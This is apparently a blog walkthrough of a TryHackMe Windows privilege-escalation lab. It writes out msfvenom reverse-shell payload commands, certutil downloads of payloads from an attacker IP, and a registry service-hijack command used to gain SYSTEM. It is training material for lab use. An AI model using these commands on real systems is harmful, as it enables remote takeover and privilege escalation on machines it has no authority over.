Tryhackme - Windows PrivEsc Arena

Tryhackme – Windows PrivEsc Arena

In this walk through, we will be going through the Windows PrivEsc Arena room from Tryhackme. This room is rated as Medium on the platform and teaches students about Windows privilege escalation techniques using a vulnerable Windows VM. So, let’s get started without any delay.

Windows PrivEsc Arena

Task 1 – Connecting to TryHackMe network

Task 1 - Connecting to TryHackMe network

Task 2 – Deploy the vulnerable machine

Question 1 – Deploy the machine and log into the user account via RDP

RDP login

RDP into machine

Question 2 – Open a command prompt and run ‘net user’. Who is the other non-default user on the machine?

cmd.exe

Task 2 - Deploy the vulnerable machine

Task 3 – Registry Escalation – Autorun

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Autoruns

Autoruns

accesschk64.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f exe -o shell.exe

generate program.exe

use multi handler

certutil.exe -urlcache -f http://10.18.1.78:8000/program.exe program.exe

download program.exe

  • Unable to write to the Autorun program folder as it requires Admin rights to write to it. However as per the accesschk output everyone had the Read and write access but was unable to replicate that in lab for some reason.

Task 4 – Registry Escalation – AlwaysInstallElevated

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Registry Policies

Registry Policies

generate setup.msi

certutil.exe -urlcache -f http://10.18.1.78:8000/setup.msi setup.msi

setup.msi download

NT authority system

Task 5 – Service Escalation – Registry

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

powershell -ep bypass

certutil.exe -urlcache -f http://10.18.1.78:8000/program.exe shell.exe

shell.exe

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\shell.exe /f

net start regsvc

shell.exe

NT authority system

Task 6 – Service Escalation – Executable Files

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

File permission service

filepermservice.exe

NT authority system

Task 7 – Privilege Escalation – Startup Applications

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

icalcs.exe

copy shell.exe

RDP login

TCM-PC\TCM

Task 8 – Service Escalation – DLL Hijacking

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Process Monitor filter

Process Monitor filter

net start dllsvc

Create File

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444  -f dll -o hijackme.dll

hijackme.dll

certutil.exe -urlcache -f http://10.18.1.78:8000/hijackme.dll hijackme.dll

hijackme.dll

net stop dllsvc & net start dllsvc

net stop dllsvc

  • I was unable to get a reverse shell back. Didn’t tried the route the walkthrough is intended to but should be worth a try.

Task 9 – Service Escalation – binPath

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

accesschk64.exe

start daclsvc

Task 10 – Service Escalation – Unquoted Service Paths

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

unquotedsvc

common.exe

sc start

NT authority system

Task 11 – Potato Escalation – Hot Potato

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Powershell -ep bypass

net localgroup administrators

Task 12 – Password Mining Escalation – Configuration Files

Question 1 – What is the cleartext password found in Unattend.xml?

Unattend.xml

base64 decode

Task 13 – Password Mining Escalation – Memory

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

HTTP basic auxiliary module

iexplorer,exe

Windows Task Manager

Dumping Process

password

Task 14 – Privilege Escalation – Kernel Exploits

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

generate payload with msfvenom

use multi handler

Local exploit suggestor

MS16_014_wmi exploit

Also Read: Tryhackme – Watcher

So that was “Windows PrivEsc Arena” for you. In this room, we covered a variety of Windows privilege escalation techniques which we can use once we landed in a windows machine. Well, the best thing on any machine is to be admin or NT authority/System and today we have learned on how we can get to that point. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top